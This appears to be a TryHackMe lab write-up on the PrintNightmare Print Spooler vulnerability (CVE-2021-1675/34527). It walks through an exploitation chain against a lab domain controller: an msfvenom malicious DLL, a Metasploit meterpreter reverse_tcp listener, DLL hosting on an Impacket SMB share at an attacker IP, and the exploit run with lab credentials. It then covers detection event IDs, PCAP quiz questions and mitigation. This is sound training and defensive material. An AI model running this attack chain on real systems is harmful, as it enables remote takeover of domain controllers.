PrintNightmare
Last updated
Last updated
Room Link: https://tryhackme.com/r/room/printnightmarehpzqlp8
Microsoft defines the Print spooler service as a service that runs on each computer system. As you can guess from the name, the Print spooler service manages the printing processes. The Print spooler's responsibilities are managing the print jobs, receiving files to be printed, queueing them, and scheduling.
You are able to Start/Stop/Pause/Resume the Print Spooler Service by simply navigating to Services on your Windows system.
Services:
Print Spooler Properties (Services):
Print spooler service makes sure to provide enough resources to the computers that send out the print jobs. Remember the early days when users had to wait for print jobs to finish to perform other operations? Well, the Print spooler service took care of this issue for us.
The Print spooler service allows the systems to act as print clients, administrative clients, or print servers. It is also important to note that the Print spooler service is enabled by default in all Windows clients and servers. It's necessary to have a Print spooler service on the computer to connect to a printer. There are third-party software and drivers provided by the printer manufacturers that would not require you to have the Print spooler service enabled. Still, most companies prefer to utilize Print spooler services.
Domain Controllers mainly use Print spooler service for printer pruning (the process of removing the printers that are not in use anymore on the network and have been added as objects to Active Directory). Printer pruning eliminates the issue for the users reaching out to a non-existent printer. You will know soon why we mentioned Domain Controllers.
To better understand the PrintNightmare vulnerability (or any vulnerability), you should get into the habit of researching the vulnerabilities by reading Microsoft articles on any Windows-specific CVE or browsing through the Internet for community and vendor blogposts.
There has been some confusion if the CVE-2021-1675 and CVE-2021-34527 are related to each other. They go under the same name: Windows Print Spooler Remote Code Execution Vulnerability and are both related to the Print Spooler.
As Microsoft states in the FAQ, the PrintNightmare (CVE-2021-34527) vulnerability "is similar but distinct from the vulnerability that is assigned CVE-2021-1675. The attack vector is different as well."
What did Microsoft mean by the attack vector? To answer this question, let's look into the differences between the two vulnerabilities and append the timeline of events.
Per Microsoft's definition, PrintNightmare vulnerability is "a remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.".
Running arbitrary code involves executing any commands of the attacker's choice and preference on a victim's machine. Suppose you had a chance to look at both CVE's on Microsoft. You would notice that the attack vectors for both are different.
To exploit the CVE-2021-1675 vulnerability, the attacker would need to have direct or local access to the machine to use a malicious DLL file to escalate privileges. To exploit the CVE-2021-34527 vulnerability successfully, the attacker can remotely inject the malicious DLL file.
Vulnerability metrics for CVE-2021-1675:
Vulnerability metrics for CVE-2021-34527:
Timeline:
June 8, 2021: Microsoft issued a patch for a privilege escalation vulnerability in the print spooler service (CVE-2021-1675).
June 21, 2021: Microsoft revised the vulnerability and changed its classification to remote code execution (RCE).
June 27, 2021: Chinese cybersecurity firm QiAnXin published a video demonstrating local privilege escalation (LPE) and RCE.
July 2, 2021: Microsoft assigns a new CVE so-called PrintNightmare vulnerability in the print spooler service (CVE-2021-34527).
July 6, 2021: Microsoft released an out-of-band patch (a patch released at some time other than the normal release time) to address CVE-2021-34527 and provides additional workarounds to defend against the exploit.
What makes PrintNightmare dangerous?
It can be exploited over the network; the attacker doesn't need direct access to the machine.
The proof-of-concept was made public on the Internet.
The Print Spooler service is enabled by DEFAULT on domain controllers and computers with SYSTEM privileges.
To understand how the attack works and what logs and events are generated, you need to put the Black Hat on and run the attack on your own. But, of course, it requires permission from management to perform this attack in your employer's environment, even if it's an isolated environment.
Fret not, you can perform the attack against the attached virtual machine and not in your employer's environment.
Follow the steps outlined below to exploit the Domain Controller using the Attack Box by exploiting the PrintNightmare vulnerability.
In the sample terminal output below, the victim is 10.10.57.176, and the attacker is 192.168.0.100.
Note: As a subscriber, launch the Attack Box if you haven't done so before proceeding. As a free user, this task should be completed on your local attacking machine.
Before proceeding, create 2 directories on the Desktop:
pn - this will contain the exploit.
share - this directory (/root/Desktop/share) will contain the malicious DLL that will be created with msfvenom.
Download CVE-2021-1675.py:
CloneCVE-2021-1675 exploit from GitHub
Kali
Before spinning up Metasploit, create the malicious DLL.
Note: In the terminal outputs below the attacker is 192.168.0.100. You will need to replace 192.168.0.100 with your ATTACK BOX IP (or OpenVPN IP).
You will use msfvenom to create the malicious DLL.
Create maliciousDLLwith Msfvenom
Kali
If you see a similar output when you run this command, then you should have successfully created the DLL.
Let's fire up Metasploit.
Kali
Once Metasploit successfully loads, you need to configure the handler to receive the incoming connection from the malicious DLL.
Run the following commands options:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost VALUE
set lport VALUE
Note: The value for LHOST and LPORT must be the same values you used to create the malicious DLL.
Configure a Metasploitlistener
Kali(msf)
Next, run it so it will be actively waiting for a connection.
Start the listener to accept incoming connections
Kali(msf)
The -j simply means to run it as a job.
Kali(msf)
Great, now you'll need to host the malicious DLL in a SMB share running on the attacker box. We'll use the AttackBox in this example.
Below is how to do this with smbserver.py from Impacket.
Start the SMB share with Impacket to host the maliciousDLL
Kali
A brief explanation for the command in the above image:
This is the name of the SMB share for the exploit execution. (Example: \\ATTACKER_IP\share\malicious.dll)
This is the local folder that will store the malicious DLL. (Example: /root/Desktop/share/malicious.dll)
Before we blindly just execute an exploit at the target, let's first examine if the target fits the criteria to exploit it.
Kali
Yep, looks good. It's finally time to run the exploit. Navigate to the location where you downloaded the exploit code from GitHub, which should be /root/Desktop/pn/CVE-2021-1675.
We will use the Python script to exploit the PrintNightmare vulnerability against the Windows 2019 Domain Controller.
Kali
A brief explanation for the command in the above image:
python3.9 CVE-2021-1675.py -> you're instructing Python to run the following Python script. The values which follow are the parameters the script needs to exploit the PrintNightmare vulnerability successfully.
Finance-01.THMdepartment.local -> the name of the domain controller (Finance-01) along with the name of the domain (THMdepartment.local)
sjohnston:mindheartbeauty76@10.10.57.176 -> the username and password for the low privilege Windows user account.
\\ATTACKER_IP_ADDRESS\share\malicious.dll -> the location to the SMB path storing the malicious DLL.
If all goes well, you should see an output similar to the below image.
Kali
You may see Python errors after Try 3... but they are safe to ignore.
Victim connects to the SMB share for the maliciousDLL
Lastly, you will have a successful Meterpreter session.
Kali(msf)
Let's imagine the worst-case scenario that the THMdepartment was compromised a couple of days after the PoC for PrintNightmare was released, and you are THMdepartment's Threat Hunter. Your company suspects that an attacker used PrintNightmare to access the Domain Controller, and your task is to find evidence or indicators of compromise. So, the next question would be what indicators should you look for in order to detect the PrintNightmare attack?
The attacker would most likely use rpcdump.py to scan for vulnerable hosts. After finding the vulnerable print server, the attacker can then execute the exploit code (similar to the Python script in the previous task), which will load the malicious DLL file to exploit the vulnerability. More specifically, the exploit code will call the pcAddPrinterDriverEx() function from the authenticated user account and load the malicious DLL file in order to exploit the vulnerability. The pcAddPrinterDriverEx() function is used to install a printer driver on the system.
Sygnia shared some advanced threat hunting tips to detect PrintNightmare. When hunting for PrintNightmare, you should look for the following:
Search for the spoolsv.exe process launching rundll32.exe as a child process without any command-line arguments Considering the usage of the pcAddPrinterDriverEx() function, you will mostly find the malicious DLL dropped into one of these folders %WINDIR%\system32\spool\drivers\x64\3\ folder along with DLLs that were loaded afterward from %WINDIR%\system32\spool\drivers\x64\3\Old\ (You should proactively monitor the folders for any unusual DLLs) Hunt for suspicious spoolsv.exe child processes (cmd.exe, powershell.exe, etc.) The attacker might even use Mimikatz to perform the attack, in this case, a print driver named ‘QMS 810’ will be created. This can be detected by logging the registry changes (e.g., Sysmon ID 13). Search for DLLs that are part of the proof-of-concept codes that were made public, such as MyExploit.dll, evil.dll, addCube.dll, rev.dll, rev2.dll, main64.dll, mimilib.dll. If they're present on the endpoint, you can find them with Event ID 808 in Microsoft-Windows-PrintService. Splunk also did a great job of providing us with some detection search queries:
Identifies Print Spooler adding a new Printer Driver:
Message Detects spoolsv.exe with a child process of rundll32.exe:
Suspicious rundll32.exe instances without any command-line arguments:
Detects when a new printer plug-in has failed to load:
Windows Event Logs are detailed records of security, system, and application notifications created by the Windows operating system. There are some logs that record events related to Print Spooler activity. Still, they might not be enabled by default and need to be configured using Windows Group Policy or Powershell.
The logs related to Print Spooler Activity are:
Microsoft-Windows-PrintService/Admin
Microsoft-Windows-PrintService/Operational
We can detect the PrintNightmare artifacts by looking at the endpoint events or Windows Event Logs mentioned above.
You can look for the following Event IDs:
Microsoft-Windows-PrintService/Operational (Event ID 316) - look for "Printer driver [file] for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, AddUser.dll, AddUser.dll. No user action is required.”
Microsoft-Windows-PrintService/Admin (Event ID 808) - A security event source has attempted to register (can detect unsigned drivers and malicious DLLs loaded by spoolsv.exe)
Microsoft-Windows-PrintService/Operational (Event ID 811) - Logs the information regarding failed operations. The event will provide information about the full path of the dropped DLL.
Microsoft-Windows-SMBClient/Security (Event ID 31017) - This Event ID can also be used to detect unsigned drivers loaded by spoolsv.exe.
Windows System (Event ID 7031) - Service Stop Operations (This event ID will show you unexpected termination of print spooler service).
You can also use Sysmon to detect PrintNightmare terror:
Microsoft-Windows-Sysmon/Operational (Event ID 3) - Network connection (Look for suspicious ports)
Microsoft-Windows-Sysmon/Operational (Event ID 11) - FileCreate (File creation events are being logged, you can look for loaded DLLs in the Print Spooler’s driver directory: C:\Windows\System32\spool\drivers\x64\3)
Microsoft-Windows-Sysmon/Operational (Event IDs 23, 26) - FileDelete (You can hunt for deleted malicious DLLs)
You are still in the middle of hunting for THMDepartment to determine if the PrintNightmare attack actually took place. Armed with all the knowledge above, can you detect the PrintNightmare artifacts in the Event Logs?
Add the following filters
Event Level
Event Logs
Event IDs
Provide the name of the dropped DLL, including the error code. (no space after the comma)
Provide the event log name and the event ID that detected the dropped DLL. (no space after the comma)
Find the source name and the event ID when the Print Spooler Service stopped unexpectedly and how many times was this event logged? (format: answer,answer,answer)
After some threat hunting steps, you are more confident now that it's a PrintNightmare attack. Hunt for the attacker's shell connection. Provide the log name, event ID, and destination port. (format: answer,answer,answer)
Find...
Oh no! You think you've found the attacker's connection. You need to know the attacker's IP address and the destination hostname in order to terminate the connection. Provide the attacker's IP address and the hostname. (format: answer,answer)
A Sysmon FileCreated event was generated and logged. Provide the full path to the dropped DLL and the earliest creation time in UTC. (format:answer,yyyy-mm-dd hh-mm-ss)
Find...
Packet captures (pcap) play a crucial role in detecting signs of compromise.
If you are not familiar with Wireshark, no worries. You can learn more about Wireshark and how to analyze the packet captures by joining the Wireshark 101 room. It will be a lot of fun!
Detecting the PrintNightmare attack, specifically to (CVE-2021-1675 and CVE-2021-34527) by analyzing the network traffic is not as easy as inspecting the artifacts like Windows Event Logs on the victim's machine. The attacker relies on adding a printer driver using DCE/RPC commands RpcAddPrinterDriver or RpcAddPrinterDriverEx.
DCE/RPC stands for Distributed Computing Environment/Remote Procedure Calls and is the remote procedure call that establishes APIs and an over-the-network protocol. But what makes the detection of the attack harder is that there are legitimate uses for RpcAddPrinterDriver or RpcAddPrinterDriverEx commands, so you cannot always rely only on the network traffic analysis to be confident that the PrintNightmare attack occurred in your environment. According to Corelight, it can get even harder to detect, especially if the exploit wraps the DCE/RPC calls in SMB3 encryption. To identify the encrypted DCE/RPC calls, you need to somehow decrypt and decode the payloads, which is a time-consuming task.
Corelight also released a Zeek package that detects the printer driver additions over DCE/RPC commands that are not encrypted.
Attached to this task is a PCAP from a PrintNightmare attack you can download and open in your local Wireshark instance.
Task: Inspect the PCAP and answer the questions below.
What is the host name of the domain controller?
Wireshark
Wireshark
What is the local domain?
Wireshark
What user account was utilized to exploit the vulnerability?
What was the malicious DLL used in the exploit?
What was the attacker's IP address?
What was the UNC path where the malicious DLL was hosted?
There are encrypted packets in the results. What was the associated protocol?
It was not just a nightmare, and now you are 100% confident that it was a PrintNightmare attack on THMDepartment. You checked the other domain controllers on your network, and it appears that they are clean.
It is not the end of the world just yet. You can still mitigate or defend against the attack by disabling the Print Spooler on all domain controllers and modify the registry settings (if applicable). How can you do it?
Microsoft provided the steps to detect if Print Spooler service is enabled and how to disable them:
First, you need to determine if the Print Spooler service is running.
Run the following in Windows PowerShell (Run as administrator):
Get-Service -Name Spooler
If Print Spooler is running or if the service is not set to disabled, then select one of the options below to either disable the Print Spooler service or to Disable inbound remote printing through Group Policy.
Option 1) Disable the Print Spooler service:
If disabling the Print Spooler service is appropriate for your environment, use the following PowerShell commands:
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
NOTE: By disabling the Print Spooler service, you remove the ability to print locally and remotely.
Option 2) Disable inbound remote printing through Group Policy:
The settings via Group Policy can be configured as follows:
Computer Configuration / Administrative Templates / Printers
Disable the “Allow Print Spooler to accept client connections” policy to block remote attacks.
This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer operate as a print server, but local printing to a directly attached device will still work.
Note: Remember that for the group policy to take effect across the domain, or even the local machine, you need to issue a gpupdate /force command.
For more information, see: Use Group Policy settings to control printers.
The security update for Windows Server 2012, Windows Server 2016, and Windows 10, Version 1607 have been released by Microsoft on July 7, 2021.
Additional steps for mitigation besides installing the updates recommended by Microsoft:
You must confirm that the following registry settings are set to 0 (zero) or are not defined (Note: The mentioned below registry keys do not exist by default, and therefore are already at the secure setting.), also check that your Group Policy settings are correct (see FAQ):
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)
UpdatePromptSettings = 0 (DWORD) or not defined (default setting)
Note: Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.
Wireshark
Wireshark
